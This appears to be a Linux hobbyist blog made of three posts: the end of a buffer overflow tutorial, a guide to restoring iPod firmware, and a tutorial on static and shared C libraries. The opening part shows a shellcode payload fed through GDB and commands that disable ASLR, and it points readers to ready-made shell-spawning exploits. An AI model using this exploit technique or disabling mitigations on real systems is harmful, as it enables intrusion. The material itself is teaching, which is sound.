There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/mvanga/Programming/test/shellcode/naive...done.
(gdb) set args `perl -e 'print "\x31\xc0\xb0\x01\x31\xdb\xcd\x80" . "a"x124 . "\x08\xf3\xff\xbf";'`
(gdb) run
Starting program: naive `perl -e 'print "\x31\xc0\xb0\x01\x31\xdb\xcd\x80" . "a"x124 . "\x08\xf3\xff\xbf";'`

Program exited normally.
(gdb) 

As you can see above, without GDB, the program ends in a segmentation fault whereas with GDB the program works. This is due to stack randomization. Basically, the kernel generates a random stack location and passes it to the program every time an executable is run. The code for stack randomization can be found in the kernel sources:

Stack Randomization Code (fs/binfmt_elf.c)
#ifndef STACK_RND_MASK
#define STACK_RND_MASK (0x7ff >> (PAGE_SHIFT - 12))     /* 8MB of VA */
#endif

static unsigned long randomize_stack_top(unsigned long stack_top)
{
    unsigned int random_variable = 0;

    if ((current->flags & PF_RANDOMIZE) &&
        !(current->personality & ADDR_NO_RANDOMIZE)) {
        random_variable = get_random_int() & STACK_RND_MASK;
        random_variable <<= PAGE_SHIFT;
    }
#ifdef CONFIG_STACK_GROWSUP
    return PAGE_ALIGN(stack_top) + random_variable;
#else
    return PAGE_ALIGN(stack_top) - random_variable;
#endif
}
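
To get a feel for the numbers, here is a minimal userspace sketch of the same arithmetic for the common case of a stack that grows downwards (the #else branch). It assumes 4 KB pages (PAGE_SHIFT of 12) and takes the random value as a parameter so that the result is repeatable. The name randomized_stack_top and the example stack top of 0xc0000000 are assumptions for illustration, not something taken from the kernel.

```c
#include <assert.h>
#include <stdint.h>

#define PAGE_SHIFT     12u
#define PAGE_SIZE      (1u << PAGE_SHIFT)
#define STACK_RND_MASK (0x7ffu >> (PAGE_SHIFT - 12u))

/*
 * Same calculation as the kernel function, for a downward-growing
 * stack: round the top up to a page boundary, then move it down by a
 * random number of pages between 0 and STACK_RND_MASK.
 */
uint32_t randomized_stack_top(uint32_t stack_top, uint32_t random_value)
{
    uint32_t aligned = (stack_top + PAGE_SIZE - 1u) & ~(PAGE_SIZE - 1u);
    uint32_t offset = (random_value & STACK_RND_MASK) << PAGE_SHIFT;

    assert(offset <= 0x7ff000u);  /* at most 0x7ff pages, just under 8 MB */

    return aligned - offset;
}
```

With a stack top of 0xc0000000 the result lands anywhere between 0xbf801000 and 0xc0000000 in steps of one page. That is 2048 possible positions, which is why a hardcoded address like 0xbffff308 almost never matches outside GDB.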

I guess some things are just hard to break apart! We did get pretty far though and that's really the fun part! But wait! Let's not give up hope yet! Linux is an open piece of software and there is indeed a way to turn off stack randomization. Turning it off is very useful for learning purposes, although randomization is an extremely clever technique that you will want to keep enabled everywhere else. You can disable stack randomization using:

$ sudo sysctl -w kernel.randomize_va_space=0
$ sudo sysctl -p

You can re-enable it using:

$ sudo sysctl -w kernel.randomize_va_space=1
$ sudo sysctl -p

Admittedly, the above didn't work on my system even though it is a documented feature. This is probably because GDB is forcing a specific stack whereas the address forced in general might be different. The one way to find that out is to print the address of a variable on the stack and backtrack to the stack address. We can then modify the shellcode accordingly. More detailed methods are provided on this page.

In this article, we have successfully managed to exploit a buffer overflow in order to execute any piece of code we want. You can now head over to a site like Packet Storm and use some of the ready made exploits from there! I especially like the one that gives you a shell prompt by calling /bin/sh! Happy Hacking!

The Apple iPod and Linux

I've been a Linux user for a couple of years now and one thing I've always had trouble with is using my iPod under Linux. I finally decided to tackle this hurdle. This article describes how I tamed an Apple product using open source tools. Hopefully it will help someone else in the same situation as me.

Let's face it. Apple tries to be quite controlling when it comes to their products. The only way to use the iPod, for example (on Windows and Mac), is to first download iTunes and use it to format the device. Being a Linux user, the last thing I wanted was to make a mess just to load songs onto my iPod, so the obvious (not to mention uninteresting!) option of trying to make iTunes work under a compatibility layer like Wine was out of the question. There is also the bloat of the iTunes software (the latest download is some 100 MB!). I also didn't want to touch a Windows system in order to get anything done.

I should also mention that the reason I needed a way to format my iPod was because I had installed Rockbox onto my iPod and was quite unsatisfied with its battery usage and features in general. I just needed a minimalist operating system on my iPod to listen to music and Apple's does a decent job of that. Rockbox is somewhat bloated and buggy for my taste. Installing Rockbox created a mess though, and I needed a way to re-install the firmware into my iPod. This is where my journey begins.

Note: I use an iPod Nano (2nd Generation)

Reinstalling the Firmware

Re-installing the firmware into an iPod is not easy without iTunes. I luckily found this article that describes the partition structure of the iPod. Hello fdisk!

Plug in the iPod and first figure out which device it shows up as. You can find out using "sudo fdisk -l" and checking the partition listing. Let's assume it's /dev/sdx. We now partition it using fdisk. I have recreated the commands below for convenience:

$ sudo fdisk /dev/sdx
n   [make new partition]
p   [primary]
1   [first partition]
[ENTER] [default first sector is 1]
5S  [5 sectors -- big enough to hold 32MB]
[on 20GB models, use "+33MB" instead of 5S]

n   [make new partition]
p   [primary]
2   [second partition]
[ENTER] [default first sector is 6]
[ENTER] [default size uses all remaining space]

t   [modify type]
1   [first partition]
0   [first partition has no filesystem; ignore warning]

t   [modify type]
2   [second partition]
b   [second partition is FAT32]

p   [show partition map]

Device Boot    Start       End    Blocks   Id  System
/dev/sdx1          1         5     40131    0  Empty
/dev/sdx2          6      3647  29254365    b  Win95 FAT32

w   [commit changes to disk]
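The Blocks column in the listing above can be checked by hand. The numbers only add up if the Start and End columns are counted in cylinders and the disk reports 255 heads and 63 sectors per track. That geometry is my assumption, since the listing does not show it. The helper name partition_blocks is made up for this sketch.

```c
/* Size in 1 KB blocks of a partition spanning cylinders first..last
 * (inclusive, counted from 1). A partition that starts at cylinder 1
 * skips the first track, which holds the partition table. */
unsigned long partition_blocks(unsigned long first, unsigned long last,
                               unsigned long heads, unsigned long sectors)
{
    /* Total number of 512-byte sectors covered by the cylinders */
    unsigned long total = (last - first + 1) * heads * sectors;

    if (first == 1)
        total -= sectors;   /* reserved first track */
    return total / 2;       /* two 512-byte sectors per 1 KB block */
}
```

Under those assumptions, partition_blocks(1, 5, 255, 63) gives 40131 and partition_blocks(6, 3647, 255, 63) gives 29254365, matching both rows of the listing. The first partition is therefore about 40 MB, comfortably more than the 32 MB the firmware needs.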

I found this site that has firmware images for various Apple products. I downloaded the one for my iPod Nano from there. The file extension is ipsw but it turns out to be a simple zip archive. Extract it using:

$ ls
iPod_29.1.1.3.ipsw
$ file iPod_29.1.1.3.ipsw 
iPod_29.1.1.3.ipsw: Zip archive data, at least v2.0 to extract
$ unzip iPod_29.1.1.3.ipsw
Archive:  iPod_29.1.1.3.ipsw
  inflating: Firmware-29.8.1.3       
  inflating: manifest.plist          
$ ls
Firmware-29.8.1.3  iPod_29.1.1.3.ipsw  manifest.plist
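The file tool recognises the archive by its first few bytes, not by its extension. A zip archive normally begins with the four-byte local file header signature "PK" followed by the bytes 3 and 4. A minimal sketch of the same check in C (looks_like_zip is a hypothetical helper name, and real tools check a lot more than this) could be:

```c
#include <stddef.h>
#include <string.h>

/* Returns 1 if the buffer starts with the zip local file header
 * signature ('P', 'K', 0x03, 0x04) and 0 otherwise. */
int looks_like_zip(const unsigned char *buf, size_t len)
{
    static const unsigned char magic[4] = { 'P', 'K', 0x03, 0x04 };

    return len >= sizeof magic && memcmp(buf, magic, sizeof magic) == 0;
}
```

To use it, read the first four bytes of the .ipsw file with fread and pass the buffer in.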

Now we need to write the Firmware* file onto the first partition of the iPod. I did this using:

$ sudo dd if=Firmware-29.8.1.3 of=/dev/sdx1

We also need to format the second partition as FAT so that we can add songs to it. Do that using:

$ sudo mkfs.vfat -F 32 -n "ipod" /dev/sdx2

In the above command, -F 32 selects a 32-bit file allocation table (FAT32) and -n sets the name of the volume to "ipod". Now just unplug the iPod and reboot it. Reconnect it and you have a clean iPod!

Adding Music

A music player is pretty much useless without ... music! While people suggest using something like Amarok or Rhythmbox for this, I found it irritating to try and set these up for my iPod. I instead used gtkPod. It has a very simple interface and lets me copy my music without any unnecessary bells and whistles. Install and run it using:

$ sudo apt-get install gtkpod
$ gtkpod

Since there are better articles on how to actually use gtkPod to do the work, I'll leave you with one of those instead of going into details. The best one I found with a lot of screenshots can be found here.

I hope this helped someone! Happy hacking!

Writing Your Own Libraries in Linux

I have library fever! I define that as a condition where you start to break any piece of software you write into constituent libraries that are flexible enough to be generic and solve a small subset of a problem well. Lately, I've been writing libraries for everything (logging, automatic protocol generation, compression and networking libraries are the ones I've churned out in the last few weeks alone!). I thought it might be useful to write an article on how libraries work and how to write them under Linux. The idea is not just to explain how they work and how to use existing libraries but to also show how you can benefit from using them.

Static Libraries vs Dynamic Libraries

Let's write a simple example to understand the difference between static and dynamic libraries. Suppose we have two files as shown below:

First C File (one.c)
#include <stdio.h>

void print_hello(char *name)
{
    printf("Hello %s!\n", name);
}

Second C File (two.c)
#include <stdio.h>

void print_bye(char *name)
{
    printf("Goodbye %s!\n", name);
}

Let's compile them and use the nm tool to see exactly what they have inside:

$ gcc -c one.c
$ gcc -c two.c
$ nm one.o
00000000 T print_hello
         U printf
$ nm two.o
00000000 T print_bye
         U printf

This means that there are two symbols (names of functions and variables, but not class/structure/type definitions) in each of the files. The ones marked with a "T" are those whose code is actually inside the object file. The ones marked with a "U" are "undefined": they are used in our object file, but their definition lives somewhere else, typically in a library. Thus the code for print_hello and print_bye can be found inside the respective object files, whereas printf is available in some outside library (in most cases the C library).
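There are a few more letters you will run into with nm. The file below is a made-up example (call_count, bump and greet are not part of our library) with one symbol of each common kind. The letters in the comments are what I would expect from running gcc -c without optimization and then nm. With optimization turned on, the static function may be inlined and disappear from the listing.

```c
#include <stdio.h>

int call_count = 1;                 /* initialized global data: "D" */

static int bump(void)               /* function local to this file: "t" */
{
    return call_count++;
}

int greet(const char *name)         /* global function: "T" */
{
    printf("Hello %s!\n", name);    /* printf is defined elsewhere: "U" */
    return bump();
}
```

As a rule of thumb, an uppercase letter means the symbol is visible to other object files, while a lowercase letter means it is local to this one.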

When these object files are linked into a program or a library, the linker needs to take every symbol that is merely referenced and find its definition in another object file or library. An object file is therefore the definitions found in the source file, converted to binary form, and available for placing into a full program.

You can actually go ahead and link all the object files together into one big mass of goo and add the goo to your program, but this is generally not a good way to do it. A better way is to "archive" them into a library. There are two flavors of libraries: static and dynamic.

A static library (on Unix-based systems) is almost always suffixed with .a (e.g. libc.a is the core C library, libm.a is the C math library). Let's try building a static library out of our two object files now:

$ ar rc libprint.a one.o two.o

Now let's try running nm on this static library to see what exactly it looks like:

$ nm libprint.a

one.o:
00000000 T print_hello
         U printf

two.o:
00000000 T print_bye
         U printf

It is just a big archive of all the object files with an index entry for each of them (in fact the ar command is short for "archive").

If you link a static library into an executable, the code taken from the library is embedded in the executable, much like linking in individual .o files. As you can imagine this can make your program very large, especially if you are using (as most modern applications do) a lot of libraries. There is one difference, however, between linking with a static library and linking with object files. When you link with a static library, only the object files containing symbols that are actually used get linked in. You can see this by statically linking a hello world program (gcc -static): the executable is far smaller than libc.a, because only printf and the object files it depends on are pulled from the archive. When linking all the object files directly, unused functions also creep into the executable, bloating it for no reason.

A dynamic or shared library is suffixed with .so. Like its static analogue, it is a large table of object code, referring to all the code compiled. We can create one using:

$ gcc -shared -o libprint.so one.o two.o

Looking at a shared library with nm is quite a bit different than the static library though. On my machine it contains about two dozen symbols only two of which are print_hello and print_bye:

$ nm libprint.so
000014f0 a _DYNAMIC
000015cc a _GLOBAL_OFFSET_TABLE_
         w _Jv_RegisterClasses
000014e0 d __CTOR_END__
000014dc d __CTOR_LIST__
000014e8 d __DTOR_END__
000014e4 d __DTOR_LIST__
000004d8 r __FRAME_END__
000014ec d __JCR_END__
000014ec d __JCR_LIST__
000015e8 A __bss_start
         w __cxa_finalize@@GLIBC_2.1.3
00000470 t __do_global_ctors_aux
00000390 t __do_global_dtors_aux
000015e0 d __dso_handle
         w __gmon_start__
00000427 t __i686.get_pc_thunk.bx
000015e8 A _edata
000015ec A _end
000004a4 T _fini
0000032c T _init
000015e8 b completed.5754
000003f0 t frame_dummy
000015e4 d p.5752
00000448 T print_bye
0000042c T print_hello
         U printf@@GLIBC_2.0

A shared library differs from a static library in one very important way: it does not embed itself in your final executable. Instead the executable contains a reference to that shared library that is resolved, not at link time, but at run-time. The extra symbols above are needed in order to support this run-time linkage mechanism. While using a shared library mechanism for a small two function library is overkill (it will actually produce bigger executables compared with static linking), the advantages are huge when building more complex libraries. The advantages of dynamic libraries are:

  • Your executable is much smaller. It only contains the code you actually wrote in your program. The functions you use from the dynamic library show up as external references and their code does not go into the binary.
  • You can share (hence the name) one library's parts in multiple executables.
  • You can, if you are careful about compatibility, change the code in the library between runs of the program, and the program will simply pick up the new library without you needing to recompile it.

There are some disadvantages of course:

  • It takes time to link a program together. With shared libraries this time is needed every time the executable runs.
  • The process is more complex. In general though, it is not our headache but the compiler's.
  • You run the risk of incompatibilities between differing versions of the library. This is known as "DLL hell" in Windows.
  • It is generally overkill for a small collection of functions.
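Run-time resolution can also be done by hand through the dlopen interface. This is a different mechanism from the automatic linking described above, but it shows the same idea: a symbol name is turned into an address while the program is running. The sketch below assumes a system with dlfcn.h, and resolve_symbol is a hypothetical helper name.

```c
#include <dlfcn.h>
#include <stdio.h>

/* Looks up `symbol` in the shared library at `path` while the program
 * is running. Passing NULL as the path searches the program itself and
 * the libraries it has already loaded. Returns NULL on failure. */
void *resolve_symbol(const char *path, const char *symbol)
{
    void *handle = dlopen(path, RTLD_NOW);
    void *address;

    if (handle == NULL) {
        fprintf(stderr, "dlopen: %s\n", dlerror());
        return NULL;
    }
    address = dlsym(handle, symbol);
    if (address == NULL) {
        const char *error = dlerror();
        fprintf(stderr, "dlsym: %s\n", error ? error : "symbol is NULL");
    }
    /* The handle is deliberately left open: closing it could unload the
     * library and invalidate the address we are about to return. */
    return address;
}
```

To call a function from our own shared library this way, cast the result of resolve_symbol("./libprint.so", "print_hello") to a pointer of type void (*)(char *) and call through it. On older C libraries you may need to add -ldl when linking.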

An Example

Let us continue our above example by adding a third unused function into another object file:

$ cat three.c       # New source file
#include <stdio.h>

void print_boo()
{
    /* Prints scary message to screen */
    printf("Boo!\n");
}
$ gcc -c three.c    # Compile into object file
$ nm three.o        # Check the symbols
00000000 T print_boo
         U puts
$ ar rc libprint.a one.o two.o three.o  # Create a static library
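$ cat main.c        # Write sample program that does not use print_boo
/* Declarations of the library functions we call */
void print_hello(char *name);
void print_bye(char *name);

int main(void)
{
    print_hello("Manohar");
    print_bye("Manohar");
    return 0;
}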
$ gcc -c main.c    # Compile our program into object file
$ gcc -o print_linked main.o one.o two.o three.o  # Link object files directly
$ ./print_linked 
Hello Manohar!
Goodbye Manohar!
$ gcc -o print_static main.o libprint.a  # Create using static linkage
$ ./print_static 
Hello Manohar!
Goodbye Manohar!

When compiling dynamic libraries, we need to do an extra step and compile source files into position independent code. This way, when the libraries are loaded dynamically, there will be no issues in addressing the symbols in the library. We can do this using the -fPIC option of gcc:

$ gcc -c -fPIC one.c    # Create position independent object file
$ gcc -c -fPIC two.c    # Create position independent object file
$ gcc -c -fPIC three.c    # Create position independent object file
$ gcc -shared -o libprint.so one.o two.o three.o  # Create a dynamic library
$ gcc -c -fPIC main.c    # Create position independent object file
$ gcc -o print_dynamic main.o -lprint -L.  # Create using dynamic linkage
$ ./print_dynamic
./print_dynamic: error while loading shared libraries: libprint.so: No such file or directory

Whoops! The program linked fine, but at run time the dynamic loader does not search the current directory for shared libraries. Extra directories to search can be listed in the LD_LIBRARY_PATH environment variable. Let's add the current directory to it:

$ export LD_LIBRARY_PATH=.:$LD_LIBRARY_PATH
$ ./print_dynamic 
Hello Manohar!
Goodbye Manohar!

Tada! We can confirm the dynamic linking of libraries using the ldd tool (I am guessing it either means "list dynamic dependencies" or "ld dependencies"):

$ ldd ./print_dynamic 
    linux-gate.so.1 =>  (0xb779c000)
    libprint.so => ./libprint.so (0xb7798000)
    libc.so.6 => /lib/i686/cmov/libc.so.6 (0xb763b000)
    /lib/ld-linux.so.2 (0xb779d000)
$ ldd ./print_static 
    linux-gate.so.1 =>  (0xb76f6000)
    libc.so.6 => /lib/i686/cmov/libc.so.6 (0xb7597000)
    /lib/ld-linux.so.2 (0xb76f7000)
$ ldd ./print_linked 
    linux-gate.so.1 =>  (0xb77df000)
    libc.so.6 => /lib/i686/cmov/libc.so.6 (0xb7680000)
    /lib/ld-linux.so.2 (0xb77e0000)

We can also try and compare the sizes for each of the executables:

$ ls -l print_*
-rwxr-xr-x 1 mvanga mvanga 4781 Mar 18 02:46 print_dynamic
-rwxr-xr-x 1 mvanga mvanga 4977 Mar 18 02:34 print_linked
-rwxr-xr-x 1 mvanga mvanga 4747 Mar 18 02:45 print_static

As expected, the statically linked print_static is smaller (by 230 bytes) than the one built from all the object files (print_linked), as the linker didn't add the unnecessary, unused code from three.o. Note that the dynamically linked print_dynamic is slightly larger (by 34 bytes) than print_static in this case, as our library is very small: the bookkeeping needed for run-time linking outweighs the code we saved. With larger libraries, dynamic linking is a great space saver.

Happy Hacking!